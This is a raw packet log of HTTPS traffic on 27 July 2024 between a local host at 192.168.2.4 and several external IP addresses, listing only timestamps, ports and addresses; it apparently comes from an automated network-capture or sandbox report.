Jul 27, 2024 07:44:28.861283064 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.861350060 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.861387968 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.861392021 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.861449003 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.861465931 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.861502886 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.861519098 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.861532927 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.861561060 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.863095045 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.865264893 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.865331888 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.865375042 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.865550041 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.872430086 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.872581005 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.872585058 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.872652054 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.872693062 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.876204967 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.876306057 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.876374006 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.876374960 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.876437902 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.883065939 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.883194923 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.883265018 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.883265018 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.883332014 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.886310101 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.886388063 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.886423111 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.886446953 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.886624098 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.889313936 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.889384031 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.889420033 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.889451981 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.889643908 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.889704943 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.939053059 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.939121008 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.939176083 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.939235926 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.939232111 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.939232111 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.939233065 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.939301968 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.939337969 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.939349890 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.939388037 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.939404011 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.939470053 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.939604998 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.939711094 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.939712048 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.939718962 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.939778090 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.939830065 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.939840078 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.939919949 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.939948082 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.940257072 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.940324068 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.940335989 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.940382957 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.940437078 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.940449953 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.940551043 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.940557003 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.940583944 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.940612078 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.942567110 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.942631960 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.942645073 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.942699909 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.942730904 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.942791939 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.942866087 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.942926884 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.942991972 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.943048954 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.948158026 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.948254108 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.948306084 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.948367119 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.948412895 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.948474884 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.948672056 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.948729992 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.954391956 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.954530954 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.954569101 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.954636097 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.954683065 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.957364082 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.963527918 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.963639021 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.963716030 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.963716030 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.963778019 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.964766979 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.964833975 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.964895010 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.964931011 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.964965105 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.964986086 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.965017080 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.979789972 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.979827881 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.979943037 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.979969025 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.979969978 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.980035067 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.980082035 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.980667114 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.980735064 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.980798006 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.980833054 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.980866909 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.980889082 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.980920076 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:29.027260065 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:29.027450085 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:29.027478933 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:29.027512074 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:29.027647018 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:29.027734041 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:29.027734041 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:29.027767897 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:29.027796030 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:29.027825117 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:29.027925968 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:29.028088093 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:29.028090954 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:29.028165102 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:29.028208017 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:29.028227091 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:29.028291941 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:29.028310061 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:29.028371096 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:29.028407097 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:29.028425932 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:29.028455019 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:29.028531075 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:29.028592110 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:29.028604984 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:29.028657913 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:29.028700113 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:29.028770924 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:29.028861046 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:29.028920889 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:29.030378103 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:29.030443907 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:29.030508995 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:29.030560017 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:29.030571938 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:29.030659914 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:29.030720949 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:29.073252916 CEST	443	62284	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:29.073355913 CEST	62284	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:29.075998068 CEST	62284	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:29.076016903 CEST	443	62284	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:29.076069117 CEST	62284	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:29.076078892 CEST	443	62284	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:29.076666117 CEST	443	62284	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:29.076854944 CEST	62284	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:29.076865911 CEST	443	62284	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:29.144295931 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:29.221863985 CEST	62285	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:29.221942902 CEST	443	62285	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:29.222031116 CEST	62285	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:29.222413063 CEST	62285	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:29.222490072 CEST	443	62285	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:29.523678064 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:29.687127113 CEST	443	62285	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:29.687325001 CEST	62285	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:29.797926903 CEST	62285	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:29.798005104 CEST	443	62285	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:29.798525095 CEST	443	62285	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:29.799937010 CEST	62285	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:29.800127029 CEST	62285	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:29.800177097 CEST	443	62285	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:30.385312080 CEST	443	62284	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:30.385663986 CEST	443	62284	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:30.385726929 CEST	62284	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:30.405941963 CEST	62284	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:30.405987978 CEST	443	62284	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:30.509644985 CEST	62286	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:30.509704113 CEST	443	62286	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:30.509790897 CEST	62286	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:30.510339975 CEST	62286	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:30.510363102 CEST	443	62286	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:30.672976971 CEST	443	62285	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:30.673103094 CEST	443	62285	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:30.673300982 CEST	62285	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:30.673413992 CEST	62285	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:30.673455000 CEST	443	62285	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:31.114139080 CEST	443	62286	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:31.114275932 CEST	62286	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:31.116722107 CEST	62286	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:31.116744041 CEST	443	62286	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:31.116862059 CEST	62286	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:31.116873026 CEST	443	62286	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:31.117274046 CEST	443	62286	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:31.117429972 CEST	62286	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:31.117443085 CEST	443	62286	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:31.579730988 CEST	62287	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:31.579816103 CEST	443	62287	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:31.579884052 CEST	62287	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:31.580795050 CEST	62287	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:31.580827951 CEST	443	62287	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:32.085217953 CEST	443	62287	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:32.085319996 CEST	62287	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:32.170509100 CEST	62287	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:32.170551062 CEST	443	62287	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:32.171472073 CEST	443	62287	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:32.173177004 CEST	62287	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:32.173392057 CEST	62287	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:32.173491955 CEST	443	62287	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:32.173657894 CEST	62287	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:32.173675060 CEST	443	62287	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:32.359203100 CEST	443	62286	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:32.359395027 CEST	443	62286	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:32.359741926 CEST	62286	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:32.377481937 CEST	62286	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:32.377511024 CEST	443	62286	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:32.377540112 CEST	62286	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:32.377553940 CEST	443	62286	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:32.493699074 CEST	62288	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:32.493789911 CEST	443	62288	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:32.494044065 CEST	62288	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:32.494395018 CEST	62288	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:32.494443893 CEST	443	62288	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:33.013814926 CEST	443	62287	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:33.014048100 CEST	443	62287	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:33.014136076 CEST	62287	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:33.014553070 CEST	62287	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:33.014595032 CEST	443	62287	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:33.049911976 CEST	62289	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:33.049952030 CEST	443	62289	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:33.050015926 CEST	62289	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:33.054286957 CEST	62289	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:33.054307938 CEST	443	62289	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:33.165044069 CEST	443	62288	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:33.165132999 CEST	62288	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:33.168209076 CEST	62288	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:33.168236017 CEST	443	62288	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:33.168304920 CEST	62288	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:33.168315887 CEST	443	62288	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:33.169343948 CEST	443	62288	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:33.169517040 CEST	62288	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:33.169533968 CEST	443	62288	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:33.545568943 CEST	443	62289	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:33.545736074 CEST	62289	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:33.547044992 CEST	62289	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:33.547059059 CEST	443	62289	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:33.547554970 CEST	443	62289	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:33.617695093 CEST	62289	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:33.617728949 CEST	62289	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:33.617978096 CEST	443	62289	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:33.995398998 CEST	443	62289	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:33.995531082 CEST	443	62289	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:33.995578051 CEST	62289	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:33.995803118 CEST	62289	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:33.995829105 CEST	443	62289	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:33.995842934 CEST	62289	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:33.995851040 CEST	443	62289	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:33.999419928 CEST	62290	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:33.999440908 CEST	443	62290	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:33.999645948 CEST	62290	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:33.999938011 CEST	62290	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:33.999953985 CEST	443	62290	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:34.035825968 CEST	443	62288	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:34.036011934 CEST	443	62288	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:34.036078930 CEST	62288	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:34.054497004 CEST	62288	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:34.054538012 CEST	443	62288	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:34.054924965 CEST	62288	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:34.054940939 CEST	443	62288	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:34.165926933 CEST	62291	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:34.165988922 CEST	443	62291	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:34.168415070 CEST	62291	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:34.168771029 CEST	62291	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:34.168787956 CEST	443	62291	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:34.769993067 CEST	443	62291	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:34.770215988 CEST	62291	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:34.772273064 CEST	62291	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:34.772325039 CEST	443	62291	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:34.772545099 CEST	62291	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:34.772558928 CEST	443	62291	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:34.772697926 CEST	443	62291	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:34.773262978 CEST	62291	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:34.785933018 CEST	443	62290	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:34.786056042 CEST	62290	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:34.794217110 CEST	62290	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:34.794243097 CEST	443	62290	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:34.794651031 CEST	443	62290	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:34.796154976 CEST	62290	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:34.796201944 CEST	62290	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:34.796293974 CEST	443	62290	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:34.811217070 CEST	62292	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:34.811296940 CEST	443	62292	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:34.811573982 CEST	62292	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:34.811922073 CEST	62292	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:34.811981916 CEST	443	62292	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:34.820573092 CEST	443	62291	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:35.163598061 CEST	443	62290	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:35.163758993 CEST	443	62290	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:35.163867950 CEST	443	62290	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:35.163933992 CEST	62290	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:35.163965940 CEST	443	62290	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:35.164067984 CEST	443	62290	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:35.164118052 CEST	62290	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:35.164129019 CEST	443	62290	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:35.164165020 CEST	62290	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:35.164171934 CEST	443	62290	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:35.164267063 CEST	443	62290	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:35.164376974 CEST	443	62290	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:35.164429903 CEST	62290	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:35.164438009 CEST	443	62290	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:35.164478064 CEST	62290	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:35.164525032 CEST	443	62290	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:35.168401957 CEST	443	62290	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:35.170636892 CEST	62290	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:35.170660019 CEST	443	62290	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:35.253742933 CEST	443	62290	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:35.253901958 CEST	62290	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:35.253932953 CEST	443	62290	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:35.253998995 CEST	443	62290	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:35.257914066 CEST	62290	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:35.269982100 CEST	62290	443	192.168.2.4	172.67.213.85
